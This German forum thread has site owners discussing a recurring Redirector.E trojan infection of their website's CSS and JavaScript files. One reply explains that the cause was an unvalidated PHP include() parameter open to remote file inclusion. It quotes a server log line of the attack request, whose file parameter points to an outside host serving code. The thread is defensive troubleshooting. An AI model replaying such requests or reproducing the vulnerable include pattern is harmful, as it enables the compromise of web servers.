Hi @ll!

Auf meiner Internetseite h**p://www.philadb.com melden die Besucher seit kurzem ein Anschlagen des Virenscanners auf den Trojaner Redirector.E, der sich offenbar auf der Seite befindet.

Nun habe ich (nach dem Zusammenkratzen des sehr spärlichen Wissens um diesen Trojaner (auch hier im Forum einmal erwähnt)), die check.js gesucht und den Ordner, der sie samt 2-3 anderen Dateien enthielt, gefunden und vom Server gelöscht, alle *.css und *.js Dateien abgeändert und neu hochgeladen. Für einen Abend ist dann Ruhe, die Dateien werden nicht verändert, selbst wenn ich sie zur Kontrolle runterlade und angucke.

Bringt alles nichts, einen Tag später ist der Ordner mit der check.js wieder da und alle css und js Dateien wieder infiziert.

Dieses Prozedere habe ich schon 4-5 Male durchgeführt, und immer kehrt der Trojaner zurück.

Um eine Infektion durch das FTP Programm auszuschließen, habe ich meinen PC gescannt und alle Trojanerreste entfernt, bevor ich mich neu eingeloggt habe (ZoneAlarm Professional Virenscanner und Firewall, aktualisiert, sind beim Betreten des FTP's an gewesen) und die Dateien entfernt/ersetzt habe. Da ich auch gelesen habe, dass der Trojaner gern über FTP infiziert, wenn er einmal das Passwort kennt, habe ich das Passwort umgehend geändert. Bringt aber auch nichts.

Da die Seite selbst geschrieben ist, könnte evtl. eine Sicherheitslücke in den php-Dateien die Trojanerinfektion auslösen, obwohl ich mich bemüht habe, alle Sicherheitslücken auszuschließen. Ich kann auch keine finden.

Weiss jemand von euch, wie man diesen Trojaner dingfest machen könnte bzw. über welche Wege der einen Server infiziert (so dass man diese Wege zumachen kann)?

Wäre euch sehr dankbar für eine Hilfe!

Gruss
DenisM

Hallo!

Da möchte ich mich gleich anschließen, denn das gleiche Problem habe ich auch!

[edit]
bitte eröffne, wie jeder andere hier auch, für dein problem einen eigenen beitrag
nur so wird sichergestellt, das jedem user übersichtlich und individuell geholfen werden kann

danke
GUA
[/edit]

Hatte ich auch. Allerdings haben Anrufe beim Webhoster nichts gebracht. Bin nun drauf gestoßen, dass in meiner CSS-Datei unten so viele Leerzeilen drin waren. Allerdings waren die nicht leer, sondern fieserweise waren die nach rechts eingerückt und irgendein Code mit drin. Da steht wohl alles drin, das der Virus braucht, um geladen zu werden und evtl. sich neu reinzuschreiben.

Checkt Eure CSS-Dateien und auch alle js-Dateien. Kann sein, dass die alle verseucht sind. zur Sicherheit würde ich auch noch Passwörter neu vergeben, kann nicht schaden.

Wollen wir mal hoffen, dass es sauber bleibt.

Hallo DenisM,

ich hatte auf meinem Server ebenfalls diesen Virus und habe ihn letztendlich beseitigen können.

Bei mir infizierte er die Homepage über eine alte, schlecht programmierte Unterseite. Ich übergab dort Pfade zu php-Dateien über die URL (per GET) und ließ sie dann durch include() in die Hauptseite einfügen ohne den Pfad vorher zu prüfen.
Übergibt der Angreifer anstatt meines Pfades "http://angriffserver../virus.php", so wird diese auf meinem Server ausgeführt und hat vollen Zugriff.

genaue Beschreibung auf php echo md5 just_a_test : safe_http gegen http-Inject Code

Wie habe ich die Schwachstelle gefunden?
Nachdem ich wiederum den gesamten Virus und alle .css und .js Dateien neu hochgeladen hatte, habe ich mich auf die Lauer gelegt und gewartet bis der Virus wieder da war (Alle 3 Stunden nachgeschaut, außer Nachts).
Als der Plagegeist wieder da war, habe ich mir sofort die log-Files (Darin sind die Zugriffe auf deine Seite gespeichert) angesehen und diesen Eintrag gefunden:
"GET /Inhalte/Alpencross/2005_end/index.php?dir=&file=http%3A%2F%2Fwww.eloge-du-bien-commun.be
%2Fblog%2Fbundled-libs%2FNet%2Focoqen%2Fxuxuyi%2Fa%2F"

(Die Angriffseite scheint selbst ein Opfer zu sein, da die Domainnamen von Angriff zu Angriff variieren).

Nachdem ich die Schwachstelle gefunden habe, war es ein leichtes diese zu schließen (gibt genügend Anleitungen im Netz wie man include-Angriffe abwehrt). Ich bekomme jetzt immer eine e-mail, wenn es der Angreifer wieder versucht (10 emails pro Tag). Durchkommen kann er aber nicht mehr.

Hoffe, dass du diese Antwort nicht mehr benötigst, wenn doch, dann wünsche ich dir viel Erfolg bei der Beseitigung des Viruses.

Gruß
highbiker